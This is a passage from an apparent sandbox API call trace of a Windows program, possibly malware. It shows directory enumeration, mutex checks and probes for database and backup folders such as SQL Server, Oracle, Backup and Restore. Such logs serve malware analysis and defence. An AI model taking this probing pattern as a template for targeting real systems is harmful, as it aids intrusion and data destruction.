lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, 
lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", 
cAlternateFileName="WEBSER~1")) returned 1 [0104.330] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0104.330] GetLastError () returned 0x12 [0104.330] FindClose (in: hFindFile=0x587720 | out: hFindFile=0x587720) returned 1 [0104.330] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.330] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.330] GlobalUnlock (hMem=0x45000c) returned 0 [0104.330] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.330] GlobalLock (hMem=0x450004) returned 0x591988 [0104.330] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.330] GlobalUnlock (hMem=0x45000c) returned 0 [0104.330] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.330] GlobalUnlock (hMem=0x450004) returned 0 [0104.330] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x587720 [0104.330] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.331] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: 
lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.331] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.331] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.331] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.331] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.331] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.331] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.331] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.331] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.331] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.331] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.331] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.331] GlobalLock (hMem=0x450004) returned 0x591988 [0104.331] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.331] GlobalUnlock (hMem=0x45000c) returned 0 [0104.331] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.331] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] OpenMutexA 
(dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.332] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0104.332] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.332] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.332] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.332] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.332] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.332] GlobalUnlock (hMem=0x450004) returned 0 [0104.332] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.332] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.332] GlobalLock (hMem=0x450004) returned 0x591988 [0104.332] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.332] GlobalUnlock (hMem=0x45000c) returned 0 [0104.332] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.332] GlobalUnlock 
(hMem=0x450004) returned 0 [0104.333] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.333] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", len=0x31 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 1 [0104.333] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.333] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.333] GlobalUnlock (hMem=0x450004) returned 0 [0104.333] GlobalLock (hMem=0x450004) returned 0x58b008 [0104.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.333] GlobalHandle (pMem=0x58b008) returned 0x450004 [0104.333] GlobalUnlock (hMem=0x450004) returned 0 [0104.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.333] GlobalUnlock (hMem=0x45000c) returned 0 [0104.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="䱈@僄W傘W企@\x18㽜V\x18\x1b")) returned 0xffffffff [0104.825] GetLastError () returned 0x3 [0104.825] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.825] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.825] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ Compact Edition\\") returned 21 [0104.825] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㼔V\x181")) returned 0xffffffff [0104.826] GetLastError () returned 0x2 [0104.826] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ Compact Edition\\") returned 9 [0104.827] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@僜W企@\x18㥔X\x18;")) returned 0xffffffff [0104.827] GetLastError () returned 0x2 [0104.827] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ Compact Edition\\") returned 8 [0104.828] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18D")) returned 0xffffffff [0104.828] GetLastError () returned 0x2 [0104.828] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: 
lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.829] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@僜W企@\x18V\x18j")) returned 0xffffffff [0104.829] GetLastError () returned 0x2 [0104.829] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.830] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", 
cAlternateFileName="V䱠@劬X企@\x18㥔X\x18q")) returned 0xffffffff [0104.830] GetLastError () returned 0x2 [0104.830] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\VP") returned 6 [0104.830] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.830] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18y")) returned 0xffffffff [0104.831] GetLastError () returned 0x2 [0104.831] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.831] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 
[0104.831] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@劬X企@\x18㥔X\x18\x81")) returned 0xffffffff [0104.831] GetLastError () returned 0x2 [0104.832] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.832] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.832] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18\x88")) returned 0xffffffff [0104.832] GetLastError () returned 0x2 [0104.832] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common 
Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@劬X企@\x18㥔X\x18\x8f")) returned 0xffffffff [0104.833] GetLastError () returned 0x2 [0104.833] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㧰X\x10") returned 6 [0104.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.834] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Restore", lpFindFileData=0x18eb80 | out: 
lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ೊ였߿", cAlternateFileName="V䱠@倴W企@\x18㧴X\x18\x97")) returned 0xffffffff [0104.834] GetLastError () returned 0x2 [0104.834] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.834] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.834] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.835] GlobalUnlock (hMem=0x45000c) returned 0 [0104.835] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.835] GlobalLock (hMem=0x450004) returned 0x591988 [0104.835] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.835] GlobalUnlock (hMem=0x45000c) returned 0 [0104.835] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.835] GlobalUnlock (hMem=0x450004) returned 0 [0104.835] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.835] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.835] CharLowerBuffW (in: lpsz="C:\\Program 
Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.835] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.836] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.836] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js 